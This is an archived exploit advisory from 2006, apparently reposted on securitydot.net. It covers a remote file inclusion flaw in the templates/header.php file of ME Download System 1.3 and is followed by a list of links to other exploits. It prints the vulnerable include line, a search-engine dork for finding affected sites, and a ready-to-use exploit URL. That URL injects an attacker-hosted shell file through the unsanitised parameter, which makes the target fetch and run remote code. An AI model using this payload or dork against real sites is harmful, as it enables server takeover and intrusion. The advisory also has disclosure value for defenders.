exploits , vulnerabilities , articles , ME Download System <= 1.3 (header.php) Remote Inclusion Vulnerability

2006-08-07

ME Download System <= 1.3 (header.php) Remote Inclusion Vulnerability

Rated as : High Risk

#=================================================================
#ME Download System 1.3 <= (header.php) Remote File Inclusion Exploit
#================================================================
#                                                                |
#Critical Level : Dangerous                                      |
#                                                                |
#Venedor site : http://www.ehmig.net/                            |
#                                                                |
#Version : 1.3                                                   |
#                                                                |
#=================================================================
#
#Dork : "ME Download System 1.3"
#
#=================================================================
#Bug in : templates/header.php
#
#Vlu Code :
#--------------------------------
#
#         include($Vb8878b936c2bd8ae0cab.'/settings_style.php');
#
#
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script
Path]/templates/header.php?Vb8878b936c2bd8ae0cab=http://SHELLURL.txt?
#
#=================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : str0ke XoRon Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya
Kambaa  NANA Kashtawa
#Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer
==================================================================
securitydot.net - 2006-08-07

Exploits - newest 10 RSS | More

2007-06-15 55500 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 32847 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 40884 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28513 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19076 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16129 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18740 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16019 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 32685 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16647 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit